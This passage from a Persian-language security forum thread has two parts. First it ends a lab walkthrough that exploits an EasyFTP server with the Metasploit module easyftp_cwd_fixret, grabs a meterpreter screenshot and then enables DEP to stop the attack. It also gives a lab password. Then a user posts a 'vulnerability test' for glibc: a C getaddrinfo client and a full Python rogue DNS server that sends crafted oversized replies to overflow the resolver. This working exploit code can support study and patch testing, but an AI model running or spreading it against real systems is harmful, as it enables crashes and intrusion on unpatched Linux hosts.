easyftp هست برای درست کردنش روی ویندوز سرور استارت رو بزنید و بنویسید sevices حالا easyftp رو ریستارت کنید درپایین ویندوز اصلی دسکتاپ کلیک کنید حالا printscan کیبرد رو فشار بدهید و حالا میبیند که دسکتاپ به clipboard کپی میشه روی ویندوز اصلی منوی استارت رو باز کنید و mspaint رو سرچ کنید و cntrl+v رو بزنید حالا فایل رو ذخیره کنید حالا روی ایکون تارگت راست کلیک کنید و به ترتیب meterpreter, explore, screenshot بروید برای جلوگیری از این حمله ما باید data execution protection (DEP) رو فعال کنیم در ویندوز تارگت در استارت روی computer راست کلیک کنید و properties رو باز کنید به advanced system setting بروید در قسمت system properties به advanced بروید در قسمت performance روی settings کلیک کنید و حالا به صفحه data execution prevention بروید و DEP را فعال کنید حالا ویندوز تارگت رو ریستارت کنید حالا با نام administrator و با پسورد p@ssw0rd لاگین شین و دوباره در ارمیتیج easyftp_cwd_fixret رو مانند بالا اجرا کنید و مراحل قبلی را طی کنید و لانچ را بزنید حال در تارگت وارد صفحه microsoft windows شوید و با پیغامی به شکل ftpbasicsvr.exe has stopped working این یعنی DEP عمل کرد و سرور شما رو با قطع کردن اتک نجات داد منابع:samsclass.info fastandeasyhacking.com
  25. SHADOW-hacker007

    با سلام. امروز اسکریپتی اوردم که میتوان تست کرد ایا سیستم شما باگ glibc دار دارد یا نه ؟؟ توجه:این اسکریپت فقط برای لینوکس هست!! این اسکریپت به دو زبان C & Python نوشته شده است. C: #include <sys/socket.h> #include <netdb.h> #include <err.h> #include <stdio.h> #include <string.h> int main(void) { struct addrinfo hints, *res; int r; memset(&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; if ((r = getaddrinfo("foo.bar.google.com", "22", &hints, &res)) != 0) errx(1, "getaddrinfo: %s", gai_strerror(r)); return 0; } Python: import socket import time import struct import threading IP = '127.0.0.1' # Insert your ip for bind() here... ANSWERS1 = 184 terminate = False last_reply = None reply_now = threading.Event() def dw(x): return struct.pack('>H', x) def dd(x): return struct.pack('>I', x) def dl(x): return struct.pack('<Q', x) def db(x): return chr(x) def udp_thread(): global terminate # Handle UDP requests sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock_udp.bind((IP, 53)) reply_counter = 0 counter = -1 answers = [] while not terminate: data, addr = sock_udp.recvfrom(1024) print '[UDP] Total Data len recv ' + str(len(data)) id_udp = struct.unpack('>H', data[0:2])[0] query_udp = data[12:] # Send truncated flag... so it retries over TCP data = dw(id_udp) # id data += dw(0x8380) # flags with truncated set data += dw(1) # questions data += dw(0) # answers data += dw(0) # authoritative data += dw(0) # additional data += query_udp # question data += '\x00' * 2500 # Need a long DNS response to force malloc answers.append((data, addr)) if len(answers) != 2: continue counter += 1 if counter % 4 == 2: answers = answers[::-1] time.sleep(0.01) sock_udp.sendto(*answers.pop(0)) reply_now.wait() sock_udp.sendto(*answers.pop(0)) sock_udp.close() def tcp_thread(): global terminate counter = -1 #Open TCP socket sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock_tcp.bind((IP, 53)) sock_tcp.listen(10) while not terminate: conn, addr = sock_tcp.accept() counter += 1 print 'Connected with ' + addr[0] + ':' + str(addr[1]) # Read entire packet data = conn.recv(1024) print '[TCP] Total Data len recv ' + str(len(data)) reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) print '[TCP] Request1 len recv ' + str(reqlen1) data1 = data[2:2+reqlen1] id1 = struct.unpack('>H', data1[0:2])[0] query1 = data[12:] # Do we have an extra request? data2 = None if len(data) > 2+reqlen1: reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) print '[TCP] Request2 len recv ' + str(reqlen2) data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] id2 = struct.unpack('>H', data2[0:2])[0] query2 = data2[12:] # Reply them on different packets data = '' data += dw(id1) # id data += dw(0x8180) # flags data += dw(1) # questions data += dw(ANSWERS1) # answers data += dw(0) # authoritative data += dw(0) # additional data += query1 # question for i in range(ANSWERS1): answer = dw(0xc00c) # name compressed answer += dw(1) # type A answer += dw(1) # class answer += dd(13) # ttl answer += dw(4) # data length answer += 'D' * 4 # data data += answer data1_reply = dw(len(data)) + data if data2: data = '' data += dw(id2) data += 'B' * (2300) data2_reply = dw(len(data)) + data else: data2_reply = None reply_now.set() time.sleep(0.01) conn.sendall(data1_reply) time.sleep(0.01) if data2: conn.sendall(data2_reply) reply_now.clear() sock_tcp.shutdown(socket.SHUT_RDWR) sock_tcp.close() if __name__ == "__main__": t = threading.Thread(target=udp_thread) t.daemon = True t.start() tcp_thread() terminate = True